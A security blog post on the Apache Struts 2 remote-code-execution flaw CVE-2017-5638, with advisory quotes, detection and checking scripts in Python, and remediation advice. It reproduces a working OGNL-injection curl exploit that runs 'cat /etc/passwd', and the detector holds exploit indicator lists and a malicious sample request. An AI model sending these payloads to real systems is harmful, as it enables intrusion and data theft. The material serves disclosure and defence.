D’oh! Another Apache Struts 2 vulnerability!
Upgrade now, some attacks are already in progress!
Another serious vulnerability was discovered in Apache Struts 2.
Affected versions
Apache Struts 2.3.5–2.3.31
Apache Struts 2.5–2.5.10
The vulnerability
The vulnerability (CVE-2017-5638, advisory S2-045), first reported by the security researcher Nike Zheng, is a remote code execution bug in the Jakarta Multipart parser of Apache Struts 2. The security advisory describes it as follows:
“It is possible to perform a RCE attack with a malicious Content-Type value. If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user.”
Cisco Talos researchers have also observed attacks that turn off the firewall on the target and then drop payloads:
“The payloads have varied but include an IRC bouncer, a DoS bot, and a sample related to the bill gates botnet”.
Technical analyses were released by the major security firms:
Cisco’s Talos
Talos has also released two Snort rules (SIDs 41818 and 41819) that detect exploitation attempts of the vulnerability: https://snort.org/advisories/talos-rules-2017-03-07-3-7-2017.
Talos suggests upgrading ASAP, because its researchers observed
“a high number of exploitation events. The majority of the exploitation attempts seem to be leveraging a publicly released proof of concept that is being used to run various commands”.
The proof of concept was released by Qualys.
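The Snort rules above match on the OGNL markers that the public proof of concept puts into the Content-Type header. The following Python script, added here as an example and not part of the original post or of Talos' rules, applies the same idea to raw HTTP requests: it parses the headers, URL-decodes each value, and flags any header that carries an OGNL expression opener (%{ or ${) or one of the identifiers the exploit chain relies on. The three sample requests are constructed for the example; the indicator list is my own choice and is not the exact content of the Snort rules.

```python
"""Detect CVE-2017-5638 style OGNL injection in HTTP request headers.

Added example: scans raw requests for the OGNL markers the Struts 2 Jakarta
multipart parser would evaluate. Indicator list is an assumption, not the
Talos Snort rule content.
"""
from urllib.parse import unquote

# An OGNL expression starts with one of these openers.
OGNL_OPENERS = ("%{", "${")
# Identifiers used by the public PoC chain; any one of them marks an exploit.
OGNL_STRONG = ("#_memberAccess", "OgnlContext", "ProcessBuilder",
               "ServletActionContext", "getExcludedClasses")


def parse_headers(raw: str) -> dict:
    """Return {header-name (lower-case): value} for a raw HTTP request.
    The request line and the body are ignored."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def ognl_indicators(value: str) -> list:
    """List the OGNL indicators present in one header value.
    Decoding twice also catches a double percent-encoded value (%25%7B)."""
    decoded = unquote(unquote(value))
    hits = [o for o in OGNL_OPENERS if o in decoded]
    hits += [s for s in OGNL_STRONG if s.lower() in decoded.lower()]
    return hits


def scan_request(raw: str) -> list:
    """Return [(header, severity, indicators)] for each suspicious header.
    'exploit' when a PoC identifier is present, 'suspicious' for an opener only."""
    findings = []
    for name, value in parse_headers(raw).items():
        hits = ognl_indicators(value)
        if not hits:
            continue
        severity = "exploit" if any(h in OGNL_STRONG for h in hits) else "suspicious"
        findings.append((name, severity, hits))
    return findings


# Constructed sample requests (not captured traffic).
LEGIT = (
    "POST /upload.action HTTP/1.1\r\n"
    "Host: app.example.test\r\n"
    "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\r\n"
    "Content-Length: 214\r\n"
    "\r\n"
    "------WebKitFormBoundary7MA4YWxkTrZu0gW\r\n"
)
MALICIOUS = (
    "GET /struts2-blank/example/HelloWorld.action HTTP/1.1\r\n"
    "Host: app.example.test\r\n"
    "Content-Type: %{(#nike='multipart/form-data')."
    "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    "(#_memberAccess?(#_memberAccess=#dm):(#context.setMemberAccess(#dm)))."
    "(#cmd='id').(#p=new java.lang.ProcessBuilder({'/bin/bash','-c',#cmd}))}\r\n"
    "\r\n"
)
ENCODED = (
    "GET /index.action HTTP/1.1\r\n"
    "Host: app.example.test\r\n"
    "Content-Type: %25%7B(%23cmd%3D'id')%7D\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, req in (("legit", LEGIT), ("malicious", MALICIOUS), ("encoded", ENCODED)):
        print(label, scan_request(req))
```

The legitimate upload is left alone because a multipart boundary cannot contain the characters an OGNL expression needs, while the request shaped like the page's curl payload is reported as "exploit" and the percent-encoded one, which lacks the PoC identifiers, only as "suspicious".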
Qualys
https://threatprotect.qualys.com/2017/03/08/apache-struts-jakarta-multipart-parser-remote-code-execution-vulnerability/
Qualys released a proof of concept that checks for the vulnerability with a single curl request (the Content-Type header is double-quoted here so that the single quotes inside the OGNL payload do not split the shell argument, as they do with the $'…' quoting used in the original post):
For our analysis, we have used below curl command to replicate the issue:
curl -i -v -s -k -X 'GET' \
  -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0' \
  -H "Content-Type:%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" \
  'http://10.10.36.22:8080/struts2-blank/example/HelloWorld.action'
It is important to note that the mere presence of the vulnerable parser is enough: the malicious value is evaluated while the Jakarta multipart parser handles the Content-Type header, so the web application does not need to implement any file upload functionality to be exploitable.
A Python script that checks for the vulnerability is also available in the Rapid7 Metasploit Framework GitHub issue tracker (a copy is mirrored in the gist below):
https://github.com/rapid7/metasploit-framework/issues/8064
https://gist.github.com/andreafortuna/23792e573fe6f72c843f8f9598db0325
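The curl proof of concept above proves exploitability by running cat /etc/passwd on the target. The following Python checker is an added example, not the Rapid7 script and not code from the original post: it sends the same member-access reset sequence in the Content-Type header, but instead of spawning a process it asks the server to add a response header carrying a random canary. Seeing that canary come back shows the expression was evaluated without executing a command. The header name X-Struts-Check, the #nike variable name and the use of addHeader on the servlet response are my own choices; that a vulnerable Jakarta parser reflects the header this way is an assumption based on the page's PoC reaching the same response object. Use it only against systems you are authorised to test.

```python
"""Non-destructive check for CVE-2017-5638 (added example, not the Rapid7 script).

The OGNL payload resets member access exactly like the public PoC, then adds a
canary response header instead of running a command. Assumption: a vulnerable
server evaluates the expression and reflects the header.
"""
import http.client
import secrets
import sys
from urllib.parse import urlparse

CANARY_HEADER = "X-Struts-Check"   # arbitrary header name chosen for this example


def build_probe(canary: str) -> str:
    """Content-Type value: member-access reset (as in the PoC) + canary header."""
    return (
        "%{(#nike='multipart/form-data')."
        "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
        "(#_memberAccess?(#_memberAccess=#dm):"
        "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
        "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
        "(#ognlUtil.getExcludedPackageNames().clear())."
        "(#ognlUtil.getExcludedClasses().clear())."
        "(#context.setMemberAccess(#dm))))."
        "(#resp=@org.apache.struts2.ServletActionContext@getResponse())."
        "(#resp.addHeader('" + CANARY_HEADER + "','" + canary + "'))}"
    )


def is_vulnerable(response_headers, canary: str) -> bool:
    """True when the canary is reflected in the check header (names are case-insensitive)."""
    for name, value in response_headers:
        if name.lower() == CANARY_HEADER.lower() and value == canary:
            return True
    return False


def check(url: str, timeout: float = 10.0) -> bool:
    """Send one GET with the probe Content-Type and report whether the canary came back."""
    u = urlparse(url)
    canary = secrets.token_hex(8)          # hex only, so it is safe inside OGNL quotes
    path = (u.path or "/") + ("?" + u.query if u.query else "")
    conn_cls = http.client.HTTPSConnection if u.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(u.hostname, u.port, timeout=timeout)
    try:
        conn.request("GET", path, headers={
            "Content-Type": build_probe(canary),
            "User-Agent": "Mozilla/5.0",
        })
        resp = conn.getresponse()
        resp.read()                        # drain the body so the connection closes cleanly
        return is_vulnerable(resp.getheaders(), canary)
    finally:
        conn.close()


if __name__ == "__main__":
    # Target defaults to the lab URL from the curl PoC above.
    target = sys.argv[1] if len(sys.argv) > 1 else \
        "http://10.10.36.22:8080/struts2-blank/example/HelloWorld.action"
    print("VULNERABLE" if check(target) else "canary not reflected")
```

A reflected canary is a positive result; an absent canary is not proof of a patched server, since a WAF or reverse proxy may strip either the request header or the response header, so a negative result should be confirmed by checking the deployed Struts version.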
Remediations?
This vulnerability has been fixed in Struts 2.3.32 and 2.5.10.1, so…upgrade ASAP! If you cannot upgrade immediately, the advisory suggests two workarounds: a servlet filter that validates the Content-Type header and rejects requests whose value does not match multipart/form-data, or switching to a different multipart parser, such as Pell.